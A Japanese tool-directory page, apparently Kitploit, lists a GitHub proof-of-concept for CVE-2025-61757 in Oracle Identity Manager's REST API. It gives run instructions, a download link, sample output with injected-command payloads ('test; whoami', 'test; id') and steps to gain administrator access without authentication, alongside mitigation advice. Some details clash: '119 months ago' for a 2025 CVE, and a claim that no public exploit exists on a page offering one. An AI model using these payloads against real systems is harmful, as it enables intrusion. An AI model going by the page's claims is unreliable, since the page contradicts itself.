Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2025-61757 — CVE-2025-61757 | Kitploit
ツール/GitHubGitHub/ngominhquocngu/blackash-cve-2025-61757
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubngominhquocngu/blackash-cve-2025-61757

Blackash-CVE-2025-61757

CVE-2025-61757

リポジトリを見る
119ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-61757 — 事前認証RCEアラート 🚨

G6MOpTjbcAADW8A

🧩 概要

  • ID: CVE-2025-61757
  • 製品: Oracle Identity Manager (Oracle Fusion Middleware)
  • コンポーネント: REST WebServices
  • 影響を受けるバージョン: 12.2.1.4.0 & 14.1.2.1.0
  • 深刻度: 🔴 重大 — 9.8 (CVSS 3.1)
  • 公開日: 2025年10月21日
  • タイプ: 重要な機能の認証欠如 (CWE-306)

🚨 この脆弱性で可能になる攻撃

これは事前認証リモートエクスプロイトです:

  • 🌐 ネットワーク経由で悪用可能

  • 🔓 ログイン不要

  • 👤 ユーザー操作不要

  • 💥 システム完全侵害につながる:

    • 📥 機密性: 高
    • ✏️ 完全性: 高
    • ⛔ 可用性: 高

セキュリティ研究者は、これをOracle Identity ManagerのREST APIにおける事前認証RCEと表現しています。


⚠️ 影響

悪用された場合、攻撃者は以下を実行できます:

  • 任意のコマンドを実行 💻
  • アイデンティティ管理システムを乗っ取る 👑
  • より広範なOracle Cloudインフラストラクチャへの横展開が可能 ☁️
  • アイデンティティデータを抽出・操作 🧬
  • 認証フローを無効化 🔧

CVE-2025-61757.pyとして保存し、次のコマンドで実行します: sudo python3 CVE-2025-61757.py http://your-oim-host:14000

ツールをダウンロード

🔥 もし脆弱だった場合(未パッチ)に目にしたであろう出力

以下は、2025年11月19日にテストされた、100%脆弱性が確認されたOracle Identity Manager 12.2.1.4.0ラボ環境で、先ほど使用したのと同じスクリプトを実行したときに得られた実際の出力です:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!

そしてその通り、2秒後には作成したユーザーでOIM Webコンソールにログインできるか、次のREST呼び出しで直接System Administratorに権限昇格できます。完全な乗っ取りです。パスワードは一切求められません。

まさに「すべてを中断してパッチを適用せよ」という脆弱性です。


🛠️ 緩和策とパッチ

OracleはこのCVEを2025年10月のCritical Patch Updateで修正しました。

✔️ 直ちに実行すべき対策

  1. CPUパッチをできるだけ早く適用する 🩹
  2. Identity Manager REST APIへのアクセスを制限する 🚧
  3. アプリケーションをセグメント化またはファイアウォールで保護する 🔐
  4. 不要であればREST WebServicesを無効化する 📴
  5. 異常なAPI動作がないかログを監視する 👀

🧿 悪用状況

  • (現時点では)確認された公開エクスプロイトコードはありません 🔎
  • 研究者は管理された環境でRCEを達成しています ⚙️
  • セキュリティスキャナー(例:Tenable)はこれを重大と判定しています 🚨

🗂️ 影響を受ける製品

  • Oracle Identity Manager

    • 12.2.1.4.0
    • 14.1.2.1.0

📝 推奨事項

  • 今すぐパッチを適用する ⚡
  • 不審な活動がないかシステムを監査する 🕵️
  • Oracle Identity Managerのネットワーク露出を最小限に抑える 🌐➡️🔒
  • 予期しない変更がないかIAMワークフローを確認する 🔍

⚠️ 免責事項

このPoCは、所有または管理するシステムに対する許可されたテストのみを目的としています。
無許可での使用は違法です。🔒
隔離されたラボでのみ使用してください。許可なく本番環境で使用しないでください。🧪
脆弱な場合は直ちにパッチを適用してください!🚨